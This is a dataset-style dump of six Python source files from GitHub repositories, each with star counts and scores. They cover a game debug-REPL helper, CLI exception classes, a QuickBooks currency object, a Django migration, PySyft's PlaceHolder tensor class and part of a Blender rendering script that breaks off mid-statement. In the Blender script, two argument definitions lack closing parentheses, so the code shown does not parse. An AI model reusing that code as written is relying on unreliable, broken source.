max_stars_repo_path | max_stars_repo_name | max_stars_count | id | content | score | int_score
---|---|---|---|---|---|---
python/wotdbg.py | wanyancan/wot-debugserver | 32 | 11000 | import os.path
import tcprepl
import BigWorld
def echo(s):
'''Send string to client'''
if tcprepl.write_client is not None:
tcprepl.write_client(s)
def exec_file(filename, exec_globals=None):
'''
Execute file
Try to find the file named `filename` and execute it. If `exec_globals` is
specified, it is used as the globals dict in the exec context.
'''
if exec_globals is None:
exec_globals = {}
if not os.path.isfile(filename):
filename = BigWorld.wg_resolveFileName(filename)
with open(filename, 'r') as f:
code = f.read()
exec(code, exec_globals)
| 2.875 | 3 |
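A minimal usage sketch of the two helpers above, as they might be typed into the attached debug REPL. It is illustrative only: `tcprepl` and `BigWorld` exist only inside the World of Tanks client (a Python 2 runtime), and the script path is a made-up example.

```python
# Hypothetical in-client REPL session; the path below is illustrative.
import wotdbg

wotdbg.echo('debugger attached')           # sent to the connected client, if any

shared_globals = {}                        # reuse one globals dict across calls
wotdbg.exec_file('scripts/client/debug_hooks.py', exec_globals=shared_globals)
wotdbg.echo('loaded %d names' % len(shared_globals))
```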
quicken/_internal/__init__.py | chrahunt/quicken | 3 | 11001 | <gh_stars>1-10
class QuickenError(Exception):
pass
| 1.039063 | 1 |
folderikon/exceptions.py | demberto/FolderIkon | 1 | 11002 | """Exceptions which are not actually raised; only their docstrings are used."""
import colorama
import sys
__all__ = [
"Error",
"ParentIsNotAFolderError",
"InvalidURLError",
"ImageFormatNotSupportedError",
"ImageNotSpecifiedError",
"FolderIconAlreadyExistsError",
"DesktopIniError",
"exception_exit",
]
class Error(Exception):
"""Base class for all FolderIkon errors."""
color = False
def __repr__(self):
return self.red(self.__doc__)
@staticmethod
def red(string):
if Error.color:
return colorama.Fore.RED + string
return string
class ParentIsNotAFolderError(Error):
"""Argument passed to --parent is not a folder."""
class InvalidURLError(Error):
"""Invalid image URL"""
def __init__(self, url):
self.__url = url
super().__init__()
def __repr__(self):
return super().__repr__() + " " + self.__url
class ImageFormatNotSupportedError(Error):
def __init__(self, fmt):
self.__fmt = fmt
super().__init__()
def __repr__(self):
return f"Image format {self.red(self.__fmt)} is not supported. Only ICO, JPG and PNG are supported."
class ImageNotSpecifiedError(Error):
"""An image with a supported format could not be found in this directory."""
class FolderIconAlreadyExistsError(Error):
"""Folder icon already exists."""
class DesktopIniError(Error):
"""The 'desktop.ini' file could not be parsed. Delete it and try again."""
def __init__(self, exc):
self.__exc = exc
super().__init__()
def __repr__(self):
exc_name = self.__exc.__class__.__name__
exc_info = f"An exception of {exc_name} occured when parsing it."
return super().__repr__() + " " + exc_info
def exception_exit(exc):
print(repr(exc()))
sys.exit(-1)
| 2.78125 | 3 |
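None of the classes above are ever raised; their docstrings double as user-facing messages through `__repr__`, and `exception_exit` prints that text and exits. A self-contained sketch of the same pattern, with class names that are illustrative rather than part of FolderIkon:

```python
import sys

class CliError(Exception):
    """Base class whose docstring is the user-facing message."""
    def __repr__(self):
        return self.__doc__

class MissingConfigError(CliError):
    """No configuration file was found in the current directory."""

def exception_exit(exc):
    # Same shape as the module above: print the docstring-backed repr, exit non-zero.
    print(repr(exc()))
    sys.exit(-1)

if __name__ == "__main__":
    exception_exit(MissingConfigError)  # prints the docstring and exits with -1
```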
quickbooks/objects/companycurrency.py | varunbheemaiah/python-quickbooks | 234 | 11003 | <gh_stars>100-1000
from six import python_2_unicode_compatible
from .base import QuickbooksManagedObject, QuickbooksTransactionEntity, Ref, CustomField, MetaData
@python_2_unicode_compatible
class CompanyCurrency(QuickbooksManagedObject, QuickbooksTransactionEntity):
"""
QBO definition: Applicable only for those companies that enable multicurrency, a companycurrency object
defines a currency that is active in the QuickBooks Online company. One or more companycurrency objects
are active based on the company's multicurrency business requirements and correspond to the list
displayed by the Currency Center in the QuickBooks Online UI
"""
class_dict = {
"CustomField": CustomField,
"MetaData": MetaData,
}
qbo_object_name = "CompanyCurrency"
def __init__(self):
super(CompanyCurrency, self).__init__()
self.Id = None
self.Code = ""
self.Name = ""
self.Active = True
self.CustomField = None
self.MetaData = None
def __str__(self):
return self.Name
def to_ref(self):
ref = Ref()
ref.name = self.Name
ref.type = self.qbo_object_name
ref.value = self.Id
return ref
| 2.5625 | 3 |
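A short sketch of how `to_ref()` above is typically used: build a currency locally and read back the reference fields it fills in. This constructs objects in memory only and makes no QuickBooks Online API calls; the field values are placeholders.

```python
# Illustrative only: no QuickBooks Online requests are made here.
from quickbooks.objects.companycurrency import CompanyCurrency

eur = CompanyCurrency()
eur.Id = "3"          # placeholder id
eur.Code = "EUR"
eur.Name = "Euro"

ref = eur.to_ref()
print(ref.name, ref.type, ref.value)   # Euro CompanyCurrency 3
```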
books/migrations/0004_alter_book_category.py | MwinyiMoha/books-service | 0 | 11004 | # Generated by Django 3.2 on 2021-04-10 12:34
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("books", "0003_auto_20210410_1231")]
operations = [
migrations.AlterField(
model_name="book",
name="category",
field=models.CharField(
choices=[
("fiction", "Fiction"),
("regular", "Regular"),
("novel", "Novel"),
],
default="regular",
max_length=7,
),
)
]
| 1.71875 | 2 |
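For context, a model field along these lines would generate the migration above. The app label, model name, and field options are taken from the migration itself; everything else is a hedged reconstruction, not the actual `books/models.py`.

```python
# Hedged reconstruction of the field this migration alters.
from django.db import models

class Book(models.Model):
    CATEGORY_CHOICES = [
        ("fiction", "Fiction"),
        ("regular", "Regular"),
        ("novel", "Novel"),
    ]
    category = models.CharField(
        max_length=7, choices=CATEGORY_CHOICES, default="regular"
    )
```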
syft/execution/placeholder.py | juharris/PySyft | 0 | 11005 | <reponame>juharris/PySyft
from itertools import zip_longest
import syft
from syft.generic.frameworks.hook import hook_args
from syft.generic.abstract.tensor import AbstractTensor
from syft.workers.abstract import AbstractWorker
from syft_proto.execution.v1.placeholder_pb2 import Placeholder as PlaceholderPB
class PlaceHolder(AbstractTensor):
def __init__(
self,
role=None,
tracing=False,
id=None,
tags: set = None,
description: str = None,
shape=None,
expected_dtype=None,
):
"""A PlaceHolder acts as a tensor but does nothing special. It can get
"instantiated" when a real tensor is appended as a child attribute. It
will forward all the commands it receives to its child tensor.
When you send a PlaceHolder, you don't send the instantiated tensors.
Args:
id: An optional string or integer id of the PlaceHolder.
"""
super().__init__(id=id, tags=tags, description=description)
if not isinstance(self.id, syft.execution.placeholder_id.PlaceholderId):
self.id = syft.execution.placeholder_id.PlaceholderId(self.id)
self.expected_shape = tuple(shape) if shape is not None else None
self.expected_dtype = expected_dtype
self.child = None
self.role = role
self.tracing = tracing
def get_class_attributes(self):
"""
Specify all the attributes needed to build a wrapper correctly when returning a response.
"""
return {"role": self.role, "tracing": self.tracing}
@classmethod
def handle_func_command(cls, command):
""" Receive an instruction for a function to be applied on a Placeholder,
Replace in the args with their child attribute, forward the command
instruction to the handle_function_command of the type of the child attributes,
get the response and wrap it in a Placeholder.
We use this method to perform the tracing.
Args:
command: instruction of a function command: (command name,
<no self>, arguments[, kwargs])
Returns:
the response of the function command
"""
cmd, _, args, kwargs = command
# Replace all PlaceHolders with their child attribute
new_args, new_kwargs, new_type = hook_args.unwrap_args_from_function(cmd, args, kwargs)
# build the new command
new_command = (cmd, None, new_args, new_kwargs)
# Send it to the appropriate class and get the response
response = new_type.handle_func_command(new_command)
# Find first placeholder in args
template_placeholder = None
for arg in args:
if isinstance(arg, PlaceHolder):
template_placeholder = arg
placeholders = PlaceHolder.convert_to_placeholders(response, template_placeholder)
if template_placeholder.tracing:
template_placeholder.role.register_action(
(command, placeholders), syft.execution.computation.ComputationAction
)
return placeholders
@staticmethod
def convert_to_placeholders(response, template_placeholder):
""" Turn back response to PlaceHolders """
if isinstance(response, (tuple, list)):
placeholders = tuple(
PlaceHolder.create_from(
r, role=template_placeholder.role, tracing=template_placeholder.tracing
)
for r in response
)
else:
placeholders = PlaceHolder.create_from(
response, role=template_placeholder.role, tracing=template_placeholder.tracing
)
return placeholders
def __getattribute__(self, name):
"""Try to find the attribute in the current object
and in case we can not then we forward it to the child
"""
try:
response = object.__getattribute__(self, name)
except AttributeError:
child = object.__getattribute__(self, "child")
response = getattr(child, name)
return response
def instantiate(self, tensor):
"""
Add a tensor as a child attribute. All operations on the placeholder will be also
executed on this child tensor.
We unwrap PlaceHolders if there are any.
"""
if isinstance(tensor, PlaceHolder):
self.child = tensor.child
else:
self.child = tensor
if hasattr(self.child, "shape"):
self.expected_shape = tuple(self.child.shape)
if hasattr(self.child, "dtype"):
self.expected_dtype = self.child.dtype
return self
def __str__(self) -> str:
"""
Compact representation of a Placeholder, including tags and optional child
"""
tags = " ".join(list(self.tags or []))
out = f"{type(self).__name__ }[Id:{self.id.value}]"
if hasattr(self, "child") and self.child is not None:
out += f">{self.child}"
return out
__repr__ = __str__
def send(self, *args, **kwargs):
"""
calls move on child & register_action to role
"""
response = self.child.send(*args, **kwargs)
placeholder = PlaceHolder.convert_to_placeholders(response, self)
command = ("send", self, args, kwargs)
self.role.register_action(
(command, placeholder), syft.execution.communication.CommunicationAction
)
return placeholder
def move(self, *args, **kwargs):
"""
calls move on a pointer tensor & register_action to role
"""
response = self.child.move(*args, **kwargs)
placeholder = PlaceHolder.convert_to_placeholders(response, self)
command = ("move", self, args, kwargs)
self.role.register_action(
(command, placeholder), syft.execution.communication.CommunicationAction
)
return placeholder
def share(self, *args, **kwargs):
"""
Send a command to remote worker to additively share a tensor via pointer tensor
"""
response = self.child.share(*args, **kwargs)
placeholder = PlaceHolder.convert_to_placeholders(response, self)
command = ("share", self, args, kwargs)
self.role.register_action(
(command, placeholder), syft.execution.communication.CommunicationAction
)
return placeholder
def fix_prec(self, *args, **kwargs):
"""
sends command to remote worker to transform a tensor to fix_precision via pointer tensor
"""
response = self.child.fix_prec(*args, **kwargs)
placeholder = PlaceHolder.convert_to_placeholders(response, self)
command = ("fix_prec", self, args, kwargs)
self.role.register_action(
(command, placeholder), syft.execution.computation.ComputationAction
)
return placeholder
def mid_get(self, *args, **kwargs):
response = self.child.mid_get(*args, **kwargs)
placeholder = PlaceHolder.convert_to_placeholders(self.child, self)
command = ("mid_get", self, args, kwargs)
self.role.register_action(
(command, placeholder), syft.execution.communication.CommunicationAction
)
return placeholder
def remote_get(self, *args, **kwargs):
"""
calls remote_get on child & register_action to role
"""
response = self.child.remote_get(*args, **kwargs)
placeholder = PlaceHolder.convert_to_placeholders(response, self)
command = ("remote_get", self, args, kwargs)
self.role.register_action(
(command, placeholder), syft.execution.communication.CommunicationAction
)
return placeholder
def remote_send(self, *args, **kwargs):
"""
calls remote_send on child & register_action to role
"""
response = self.child.remote_send(*args, **kwargs)
placeholder = PlaceHolder.convert_to_placeholders(response, self)
command = ("remote_send", self, args, kwargs)
self.role.register_action(
(command, placeholder), syft.execution.communication.CommunicationAction
)
return placeholder
def share_(self, *args, **kwargs):
"""
calls share_ on child & register_action to role
"""
response = self.child.share_(*args, **kwargs)
placeholder = PlaceHolder.convert_to_placeholders(response, self)
command = ("share_", self, args, kwargs)
self.role.register_action(
(command, placeholder), syft.execution.communication.CommunicationAction
)
return placeholder
def get(self, *args, **kwargs):
"""Requests the tensor/chain being pointed to, be serialized and return via child"""
response = self.child.get(*args, **kwargs)
placeholder = PlaceHolder.convert_to_placeholders(response, self)
command = ("get", self, args, kwargs)
self.role.register_action(
(command, placeholder), syft.execution.communication.CommunicationAction
)
return placeholder
def copy(self):
"""
Copying a placeholder doesn't duplicate the child attribute, because all
copy operations happen locally, where we want to keep a reference to the same
instantiated object. As the child doesn't get sent, this is not an issue.
"""
placeholder = PlaceHolder(
role=self.role,
tracing=self.tracing,
tags=self.tags,
shape=self.expected_shape,
expected_dtype=self.expected_dtype,
)
placeholder.child = self.child
if self.tracing:
command = ("copy", self, (), {}), placeholder
self.role.register_action(command, syft.execution.computation.ComputationAction)
return placeholder
@staticmethod
def create_from(tensor, role=None, tracing=False):
""" Helper method to create a placeholder already
instantiated with tensor.
"""
return PlaceHolder(role=role, tracing=tracing).instantiate(tensor)
@staticmethod
def insert(tensor, after, role=None, tracing=False):
""" Helper method to add a placeholder in the specific place of tensor chain. """
current_level = tensor
while not isinstance(current_level, after) and current_level is not None:
current_level = getattr(current_level, "child", None)
if current_level is None:
raise RuntimeError(
f"Cannot insert Placeholder, chain does not contain {after.__name__} tensor type."
)
child = getattr(current_level, "child", None)
if child is None:
raise RuntimeError(
f"Cannot insert Placeholder, {after.__name__} does not wrap anything."
)
placeholder = PlaceHolder.create_from(child, role, tracing)
current_level.child = placeholder
return placeholder
@staticmethod
def extract(tensor):
""" Helper method to find and return placeholder in the tensor chain. """
current_level = tensor
while not isinstance(current_level, PlaceHolder) and current_level is not None:
current_level = getattr(current_level, "child", None)
return current_level
@staticmethod
def create_placeholders(args_shape, args_dtypes=()):
""" Helper method to create a list of placeholders with shapes
in args_shape.
"""
# In order to support -1 value in shape to indicate any dimension
# we map -1 to 1 for shape dimensions.
# TODO: A more complex strategy could be used
mapped_shapes = []
for shape in args_shape:
if list(filter(lambda x: x < -1, shape)):
raise ValueError(f"Invalid shape {shape}")
mapped_shapes.append(tuple(map(lambda y: 1 if y == -1 else y, shape)))
return [
syft.framework.hook.create_zeros(shape, dtype=dtype, requires_grad=False)
for shape, dtype in zip_longest(mapped_shapes, args_dtypes)
]
@staticmethod
def instantiate_placeholders(obj, response):
"""
Utility function to recursively instantiate an object containing placeholders
from a similar object containing tensors.
"""
if obj is not None:
if isinstance(obj, PlaceHolder):
obj.instantiate(response)
elif isinstance(obj, (list, tuple)):
for ph, rep in zip(obj, response):
PlaceHolder.instantiate_placeholders(ph, rep)
else:
raise ValueError(
f"Response of type {type(response)} is not supported in "
"Placeholder.instantiate."
)
@staticmethod
def simplify(worker: AbstractWorker, placeholder: "PlaceHolder") -> tuple:
"""Takes the attributes of a PlaceHolder and saves them in a tuple.
Args:
worker: the worker doing the serialization
placeholder: a PlaceHolder.
Returns:
tuple: a tuple holding the unique attributes of the PlaceHolder.
"""
return (
syft.serde.msgpack.serde._simplify(worker, placeholder.id),
syft.serde.msgpack.serde._simplify(worker, placeholder.tags),
syft.serde.msgpack.serde._simplify(worker, placeholder.description),
syft.serde.msgpack.serde._simplify(worker, placeholder.expected_shape),
)
@staticmethod
def detail(worker: AbstractWorker, tensor_tuple: tuple) -> "PlaceHolder":
"""
This function reconstructs a PlaceHolder given its attributes in the form of a tuple.
Args:
worker: the worker doing the deserialization
tensor_tuple: a tuple holding the attributes of the PlaceHolder
Returns:
PlaceHolder: a PlaceHolder
"""
tensor_id, tags, description, shape = tensor_tuple
tensor_id = syft.serde.msgpack.serde._detail(worker, tensor_id)
tags = syft.serde.msgpack.serde._detail(worker, tags)
description = syft.serde.msgpack.serde._detail(worker, description)
shape = syft.serde.msgpack.serde._detail(worker, shape)
return PlaceHolder(id=tensor_id, tags=tags, description=description, shape=shape)
@staticmethod
def bufferize(worker: AbstractWorker, placeholder: "PlaceHolder") -> PlaceholderPB:
"""Takes the attributes of a PlaceHolder and saves them in a Protobuf message.
Args:
worker: the worker doing the serialization
placeholder: a PlaceHolder.
Returns:
PlaceholderPB: a Protobuf message holding the unique attributes of the PlaceHolder.
"""
protobuf_placeholder = PlaceholderPB()
syft.serde.protobuf.proto.set_protobuf_id(protobuf_placeholder.id, placeholder.id.value)
protobuf_placeholder.tags.extend(placeholder.tags)
if placeholder.description:
protobuf_placeholder.description = placeholder.description
if placeholder.expected_shape:
protobuf_placeholder.expected_shape.dims.extend(placeholder.expected_shape)
return protobuf_placeholder
@staticmethod
def unbufferize(worker: AbstractWorker, protobuf_placeholder: PlaceholderPB) -> "PlaceHolder":
"""
This function reconstructs a PlaceHolder given its attributes in the form of a
Protobuf message.
Args:
worker: the worker doing the deserialization
protobuf_placeholder: a Protobuf message holding the attributes of the PlaceHolder
Returns:
PlaceHolder: a PlaceHolder
"""
tensor_id = syft.serde.protobuf.proto.get_protobuf_id(protobuf_placeholder.id)
tags = set(protobuf_placeholder.tags)
description = None
if bool(protobuf_placeholder.description):
description = protobuf_placeholder.description
expected_shape = tuple(protobuf_placeholder.expected_shape.dims) or None
return PlaceHolder(id=tensor_id, tags=tags, description=description, shape=expected_shape)
@staticmethod
def get_protobuf_schema() -> PlaceholderPB:
return PlaceholderPB
### Register the tensor with hook_args.py ###
hook_args.default_register_tensor(PlaceHolder)
| 2.0625 | 2 |
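A hedged usage sketch of the non-tracing part of the API above (`create_from`, `instantiate`, `extract`). It assumes this version of PySyft is importable; a plain list stands in for the child, which `instantiate` accepts because it only probes optional `shape`/`dtype` attributes. A real torch tensor would additionally populate `expected_shape` and `expected_dtype`.

```python
# Hedged sketch; requires the PySyft version this module comes from.
from syft.execution.placeholder import PlaceHolder

ph = PlaceHolder.create_from([1, 2, 3])   # wrap an arbitrary object as the child

print(ph)         # e.g. PlaceHolder[Id:...]>[1, 2, 3]
print(ph.child)   # [1, 2, 3]

# extract() walks a tensor chain and returns the first PlaceHolder it finds.
print(PlaceHolder.extract(ph) is ph)      # True
```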
creativeflow/blender/render_main.py | idaho777/creativeflow | 53 | 11006 | """
MAIN STYLING AND RENDERING FILE
Requirements:
------------------------------------------------------------------------------
IMPORTANT! This has only been tested with Blender 2.79 API. We have run this
on Linux and MacOS.
Execution:
------------------------------------------------------------------------------
This script is intended to run inside blender launched in background mode.
Sample invocation is:
blender --background --factory-startup --python-exit-code 1 PATH_TO_MY_BLEND.blend \
--python blender/render_main.py -- \
--width=500 <ANY OTHER PYTHON FLAGS FROM render_main.py>
'--factory-startup' is used to prevent custom settings from interfering.
'--python-exit-code 1' makes blender exit with code 1 if this script throws an error
'--' causes blender to ignore all following arguments so python can use them.
See blender --help for details. See pipeline.sh for sample usage.
Capabilities:
------------------------------------------------------------------------------
It is assumed that blender is invoked with a single blend. This script is a
jack-of-all-trades for setting up camera, lighting, styling, and rendering for
a custom stylized animation benchmark. We found it easier to run the script
separately for each phase of data processing (see pipeline.sh),
as this way the output can be easily examined for problems after every stage.
However, one-shot execution should also be possible.
See flags below for full capabilities. The trickiest bit is that different metadata
passes only work with a particular render engine option. The script will raise errors
if the incorrect engine is specified:
- Vertex paint for correspondences - blender render (no gamma correction!)
- Normals in camera space - blender render (no gamma correction!)
- Flow vector pass - cycles (blender render is buggy)
- Red stylit reference material - cycles
- Env lighting for mixamo models - blender render only
"""
import bpy
import argparse
import logging
import os
import random
import sys
import time
import traceback
# Add to path to make sure we can import modules while running inside Blender.
__sdir = os.path.dirname(os.path.realpath(__file__))
if __sdir not in sys.path:
sys.path.append(__sdir)
import color_util
import geo_util
import io_util
import render_util
import stylit_util
LOG = logging.getLogger(__name__)
if __name__ == "__main__":
try:
# FLAGS
# --------------------------------------------------------------------------
parser = argparse.ArgumentParser(
description='Configurable utility to modify blend and/or render images/flow/metadata.')
parser.add_argument(
'--random_seed', action='store', type=int, default=-1,
help='Integer seed for random number generator; used if > 0.')
# Rendering ----------------------------------------------------------------
parser.add_argument(
'--width', action='store', type=int, default=1500,
help='Width to render at.')
parser.add_argument(
'--height', action='store', type=int, default=1500,
help='Height to render at.')
parser.add_argument(
'--quality_samples', action='store', type=int, default=-1,
help='If positive and using cycles, will use this many samples per pixel; ' +
'e.g. 128 is slow, 10 is comparatively fast.')
parser.add_argument(
'--start_frame', action='store', type=int, default=0,
help='Frame to start rendering at (relative to first frame).')
parser.add_argument(
'--rendered_frames', action='store', type=int, default=0,
help='Maximum frames to render; 0 for none; -1 for all.')
parser.add_argument(
'--skip_existing_frames', action='store_true', default=False,
help='If true, skips existing frames matching --frame_output_prefix.')
parser.add_argument(
'--use_cycles', action='store_true', default=False,
help='If true, sets Cycles as the rendering engine, else leaves unchanged.')
parser.add_argument(
'--use_blender_render', action='store_true', default=False,
help='If true, sets Blender Render as the rendering engine, else leaves unchanged.')
# Outputs ------------------------------------------------------------------
parser.add_argument(
'--frame_output_prefix', action='store', type=str, default='',
help='If set, will set image output to <frame_output_prefix><frame#>.PNG; ' +
'should include full path.')
parser.add_argument(
'--render_metadata_exr', action='store_true', default=False,
help='If true, renders all metadata passes as a multilayer EXR file.')
parser.add_argument(
'--objectids_key_file', action='store', type=str, default='',
help='Directory to write objectids to, as images.')
parser.add_argument(
'--world_normals_output_dir', action='store', type=str, default='',
help='Directory to write world space normals to, as images ' +
'(only compatible with --use_cycles).'
parser.add_argument(
'--camera_normals_output_dir', action='store', type=str, default='',
help='Directory to write camera space normals to, as images ' +
'(only compatible with --use_blender_render).'
parser.add_argument(
'--enable_gamma_correction', action='store_true', default=False,
help='We disable gamma correction by default, as it corrupts the ' +
'metadata rendering; set this on to enable.')
parser.add_argument(
'--bg_name', action='store', type=str, default="STYMO_BG",
help='If any object name matches this substring, it will be treated as ' +
'background for the purpose of id labeling and stylit rendering.')
parser.add_argument(
'--output_blend', action='store', type=str, default='',
help='If set, will output modified blend here (must be absolute path); ' +
'if setting linestyle and/or material, will replace special substrings ' +
'<M> and <L> with material and linestyle.')
parser.add_argument(
'--info_file', action='store', type=str, default='',
help='If set, may output auxiliary information into this file.')
# Camera -------------------------------------------------------------------
parser.add_argument(
'--set_camera', action='store', type=int, default=0,
help='If >= 0, selects ith camera and deletes all other cameras; ' +
'if i > num cameras, generates a random one instead.')
parser.add_argument(
'--keep_extra_cameras', action='store_true',
help='If --set_camera, will not delete extra cameras.')
parser.add_argument(
'--add_random_camera_motion', action='store_true',
help='If generating a random camera and this is true, creates zoom/flyaround/pan; '
'WARNING: parameters are tuned for mixamo character blends.')
# Animation range ----------------------------------------------------------
parser.add_argument(
'--offset_scene_start_frame_by', action='store', type=int, default=0,
help='Unlike --start_frame, which just controls the rendering range, this ' +
'flag offsets the current scene start frame in the timeline by the ' +
'specified amount. Relevant to blends that do not begin at frame 0.')
parser.add_argument(
'--offset_scene_end_frame_by', action='store', type=int, default=0,
help='Unlike --rendered_frames, which just controls the rendering range, this ' +
'flag offsets the current scene end frame in the timeline by the ' +
'specified amount. Relevant to blends that do not begin at frame 0.')
# Lighting -----------------------------------------------------------------
parser.add_argument(
'--set_env_lighting_image', action='store', type=str, default='',
help='Set to image path or directory of environment map images to set ' +
'environment lighting; only works with --use_blender_render.')
parser.add_argument(
'--set_stylit_lighting', action='store_true',
help='If true, sets consistent lighting to render input for stylit.')
# Styles -------------------------------------------------------------------
parser.add_argument(
'--set_stylit_style', action='store_true',
help='If true, sets red material style used for stylit style transfer.')
parser.add_argument(
'--set_corresp_style', action='store_true',
help='If true, will set per-vertex materials to render correspondences.')
parser.add_argument(
'--set_objectids_style', action='store_true',
help='If true, will set objectids to render using flat materials.')
parser.add_argument(
'--deterministic_objectid_colors', action='store_true',
help='If true, objectid colors will not be shuffled; use for testing.')
parser.add_argument(
'--linestyles_blend', action='store', type=str, default='',
help='Path to blend containing all the line styles.')
parser.add_argument(
'--set_linestyle_matching', action='store', type=str, default='',
help='Regex matching linestyle(s) in --line_styles_blend; '
'if more than one match, picks random one; '
'"" for none; ".*" for all; "hi|bye" to match either.')
parser.add_argument(
'--randomize_line_color', action='store_true',
help='If true, randomizes line color if line is set.')
parser.add_argument(
'--materials_blend', action='store', type=str, default='',
help='Path to blend containing all the material styles (e.g. textured blender styles).')
parser.add_argument(
'--set_materials_matching', action='store', type=str, default='',
help='Regex matching materials(s) in --materials_blend; '
'if more than one match, picks random one; '
'"" for none; ".*" for all; "hi|bye" to match either.')
parser.add_argument(
'--randomize_material_color', action='store_true',
help='If true, randomizes material color if material is set.')
# Custom color control
parser.add_argument(
'--material_color_choices', action='store', type=str, default='',
help='String of format R,G,B R2,G2,B2 ... of colors to choose from if ' +
'randomizing material colors.')
parser.add_argument(
'--line_hue_range', action='store', type=str, default='0,1.0',
help='If --randomize_line_color, will keep HSV Hue in this range (two numbers,csv).')
parser.add_argument(
'--line_sat_range', action='store', type=str, default='0,1.0',
help='If --randomize_line_color, will keep HSV Saturation in this range (two numbers,csv).')
parser.add_argument(
'--line_value_range', action='store', type=str, default='0,1.0',
help='If --randomize_line_color, will keep HSV Value in this range (two numbers,csv).')
# Parse only arguments after --
# --------------------------------------------------------------------------
argv = sys.argv
if "--" not in argv:
argv = [] # as if no args are passed
else:
argv = argv[argv.index("--") + 1:]
args = parser.parse_args(argv)
if args.random_seed > 0:
print('Using --random_seed=%d as random seed.' % args.random_seed)
random.seed(args.random_seed)
else:
print('Using time as random seed.')
random.seed(time.time())
render_util.print_blend_diagnostics()
# Handle camera ------------------------------------------------------------
if args.set_camera >= 0:
cam = None
if args.keep_extra_cameras:
cam = geo_util.get_camera_by_number(args.set_camera)
else:
cam = geo_util.delete_all_but_one_camera(args.set_camera)
if cam is None:
print('Generating a random camera.')
bbox = geo_util.get_scene_bbox()
cam = geo_util.create_random_camera(bbox, 2.5, 2.5, 2.5)
if args.add_random_camera_motion:
print('Adding motion to camera.')
geo_util.mixamo_add_random_camera_motion(cam)
geo_util.disable_camera_depth_of_field(cam)
else:
cam = geo_util.get_single_camera_or_die()
# Set active camera
bpy.context.scene.camera = cam
# Handle frame bounds ------------------------------------------------------
orig_start = bpy.context.scene.frame_start
bpy.context.scene.frame_start = orig_start + args.offset_scene_start_frame_by
if args.offset_scene_end_frame_by > 0:
bpy.context.scene.frame_end = orig_start + args.offset_scene_end_frame_by
# Handle lighting ----------------------------------------------------------
info_file = None
if args.info_file:
info_file = open(args.info_file, 'w')
if len(args.set_env_lighting_image) > 0:
if not args.use_blender_render:
raise RuntimeError(
'Error: --set_env_lighting_image="img" only works with --use_blender_render')
render_util.setup_realistic_lighting(args.set_env_lighting_image, 10.0, False)
if args.set_stylit_lighting:
if not args.use_cycles:
raise RuntimeError(
'Error: --set_stylit_lighting only works with --use_cycles')
stylit_util.setup_stylit_lighting()
# Handle styles ------------------------------------------------------------
nstyles = len([x for x in [args.set_stylit_lighting,
args.set_corresp_style, args.set_objectids_style,
(args.set_linestyle_matching or args.set_materials_matching)]
if x])
if nstyles > 1:
raise RuntimeError(
'Error: incompatible rendering styles specified; only one of these can be true: ' +
'--set_stylit_lighting OR ' +
'--set_corresp_style OR --set_objectids_style OR ' +
'(--set_linestyle_matching and/or --set_materials_matching)')
linestyle_name = 'default'
material_name = 'default'
if args.set_stylit_style: # Red material used for stylit rendering
if not args.use_cycles:
raise RuntimeError(
'Error: --set_stylit_style only works with --use_cycles')
render_util.clear_unnecessary_settings()
stylit_util.setup_stylit_materials(bg_name=args.bg_name)
elif args.set_corresp_style: # Per-vertex correspondence rendering
if not args.use_blender_render:
raise RuntimeError(
'Correspondence rendering (--set_corresp_style) only implemented for ' +
'--use_blender_render')
render_util.clear_unnecessary_settings()
render_util.set_correspondence_style()
elif args.set_objectids_style: # Object Ids rendered in flat color
if not args.use_blender_render:
raise RuntimeError(
'Object id rendering (--set_objectids_style) only implemented for ' +
'--use_blender_render')
render_util.clear_unnecessary_settings()
idsinfo = render_util.set_objectids_style(
bg_name=args.bg_name, deterministic=args.deterministic_objectid_colors)
if idsinfo and args.objectids_key_file:
with open(os.path.join(args.objectids_key_file), 'w') as f:
for i in range(len(idsinfo)):
f.write('%s %d %d %d\n' %
(idsinfo[i][0], idsinfo[i][1][0],
idsinfo[i][1][1], idsinfo[i][1][2]))
elif args.set_linestyle_matching or args.set_materials_matching: # Freestyle / toon shading
if not args.use_blender_render:
raise RuntimeError(
'Linestyles and materials only implemented for --use_blender_render')
render_util.clear_unnecessary_settings()
if len(args.set_linestyle_matching) > 0:
if len(args.linestyles_blend) == 0:
raise RuntimeError(
'Error: Must set --linestyles_blend with line exemplars ' +
'if requesting --set_linestyle_matching.')
line_color = None
if args.randomize_line_color:
line_color = color_util.get_random_color(
prob_dark=0.8,
bounds=color_util.parse_hsv_bounds(args.line_hue_range,
args.line_sat_range,
args.line_value_range))
linestyle_name = render_util.set_linestyle(
args.linestyles_blend, args.set_linestyle_matching,
color=line_color)
if info_file:
info_file.write('LINESTYLE %s\n' % io_util.strip_blender_name(linestyle_name))
if len(args.set_materials_matching) > 0:
if len(args.materials_blend) == 0:
raise RuntimeError(
'Error: Must set --materials_blend with material ' +
'exemplars if requesting --set_materials_matching.')
mat_color_randomizer = None
if args.randomize_material_color:
if args.material_color_choices:
mat_color_randomizer = color_util.make_color_getter(
args.material_color_choices)
else:
mat_color_randomizer = color_util.make_random_color_getter()
material_name = render_util.set_materials(
args.materials_blend, args.set_materials_matching,
color_randomizer=mat_color_randomizer)
if info_file:
info_file.write('MATSTYLE %s\n' % io_util.strip_blender_name(material_name))
# Handle rendering settings ------------------------------------------------
if args.use_cycles and args.use_blender_render:
raise RuntimeError('Can specify only one of --use_cycles and --use_blender_render')
if args.use_cycles or args.use_blender_render:
nsamples = (args.quality_samples if args.quality_samples > 0 else None)
render_util.set_render_settings(args.use_cycles, nsamples=nsamples,
enable_gamma=args.enable_gamma_correction)
if args.width > 0 and args.height > 0:
render_util.set_width_height(args.width, args.height)
if args.world_normals_output_dir or args.camera_normals_output_dir:
if args.world_normals_output_dir and args.camera_normals_output_dir:
raise RuntimeError('Only one type of normals can be output at once.')
if args.world_normals_output_dir and not args.use_cycles:
raise RuntimeError('World normals can only be output with --use_cycles.')
elif args.camera_normals_output_dir and not args.use_blender_render:
raise RuntimeError('Camera space normals can only be output with --use_blender_render.')
render_util.init_normals_render_nodes(
(args.world_normals_output_dir or args.camera_normals_output_dir),
use_cycles=args.use_cycles)
# Handle saving -------------------------------------------------------
if len(args.output_blend) > 0:
bpy.ops.file.pack_all()
args.output_blend = args.output_blend.replace('<M>', io_util.strip_blender_name(material_name))
args.output_blend = args.output_blend.replace('<L>', io_util.strip_blender_name(linestyle_name))
print('Saving blend to %s' % args.output_blend)
geo_util.save_blend(args.output_blend)
if args.rendered_frames != 0:
if args.render_metadata_exr and not args.use_cycles:
